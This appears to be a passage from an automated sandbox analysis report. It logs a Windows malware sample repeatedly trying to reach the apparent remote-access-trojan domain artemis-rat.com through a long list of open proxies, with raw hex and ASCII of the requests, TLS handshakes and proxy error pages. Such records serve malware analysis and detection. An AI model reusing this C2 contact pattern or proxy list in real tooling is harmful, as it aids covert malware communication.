0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              721192.168.2.45126780.87.200.14090507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.977832079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.493258953 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              722192.168.2.452212200.43.231.441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.977965117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              723192.168.2.45227394.130.94.45807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.978029013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              724192.168.2.451614107.181.168.14541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.978471994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              725192.168.2.452225123.126.158.50807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.978519917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.630369902 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx
                                              Mar 11, 2024 08:37:20.662856102 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee b4 af 1a 79 ba a3 05 cd 34 e2 0c cb e0 63 e3 ac 07 82 ff 9b 4b 40 35 22 ca 9c a6 d8 0b e2 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: ey4cK@5"*,+0/$#('=<5/Uartemis-rat.com#
                                              Mar 11, 2024 08:37:21.310965061 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee b4 b0 93 44 75 3e 52 c5 87 8a 21 2f ac 0f 6b 46 bd bb 9f 7d 41 33 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                              Data Ascii: C?eDu>R!/kF}A3DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                              Mar 11, 2024 08:37:21.310971975 CET536INData Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00
                                              Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
                                              Mar 11, 2024 08:37:21.311080933 CET376INData Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c
                                              Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
                                              Mar 11, 2024 08:37:22.637311935 CET536INData Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31
                                              Data Ascii: |0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
                                              Mar 11, 2024 08:37:22.637357950 CET536INData Raw: 01 a3 82 01 76 30 82 01 72 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d
                                              Data Ascii: v0r0U0U%0++0U00Un+_+0U#0+&q+H'/Rf,q>0h+\0Z0&+0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.
                                              Mar 11, 2024 08:37:22.637455940 CET536INData Raw: b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd 71 d8 61 65 39 84 ac 32 3e f7 7a 36 f1 56 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5
                                              Data Ascii: G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[pe
                                              Mar 11, 2024 08:37:22.637469053 CET536INData Raw: 32 38 30 30 30 30 34 32 5a 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 31
                                              Data Ascii: 28000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10"0*H0w;>@<}2qj.K+^R#'c~^hZGM3NlKd)%#=.`
                                              Mar 11, 2024 08:37:22.637515068 CET536INData Raw: 3a 66 ec 07 8a 26 df 13 d7 57 65 78 27 de 5e 49 14 00 a2 00 7f 9a a8 21 b6 a9 b1 95 b0 a5 b9 0d 16 11 da c7 6c 48 3c 40 e0 7e 0d 5a cd 56 3c d1 97 05 b9 cb 4b ed 39 4b 9c c4 3f d2 55 13 6e 24 b0 d6 71 fa f4 c1 ba cc ed 1b f5 fe 81 41 d8 00 98 3d
                                              Data Ascii: :f&Wex'^I!lH<@~ZV<K9K?Un$qA=:z78040U0U00U+&q+H'/Rf,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.
                                              Mar 11, 2024 08:37:22.637559891 CET466INData Raw: a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7 d3 26 bf 70 e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3
                                              Data Ascii: oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( v>B|/-6P~RAl0EYOdHN6#)^RMDE<


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              726192.168.2.45219241.77.188.131807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.978521109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.345021963 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Content-Length: 597
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was una
                                              Mar 11, 2024 08:37:20.426969051 CET372INData Raw: 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20
                                              Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              727192.168.2.452272185.5.209.101807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.979005098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:42.476903915 CET749INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:38:42 GMT
                                              Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                              Content-Length: 530
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              728192.168.2.452290152.32.132.220807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.979074001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.663203955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.904270887 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.1
                                              Date: Mon, 11 Mar 2024 07:41:52 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              729192.168.2.452182202.162.219.1010807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.979526997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              730192.168.2.449814188.165.213.106807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.980192900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.053997040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.069755077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163388014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.256901979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.366194010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:00.099777937 CET806INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:38:59 GMT
                                              Server: Apache/2.4.52 (Ubuntu)
                                              Content-Length: 614
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              731192.168.2.452398104.19.5.247807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.990279913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
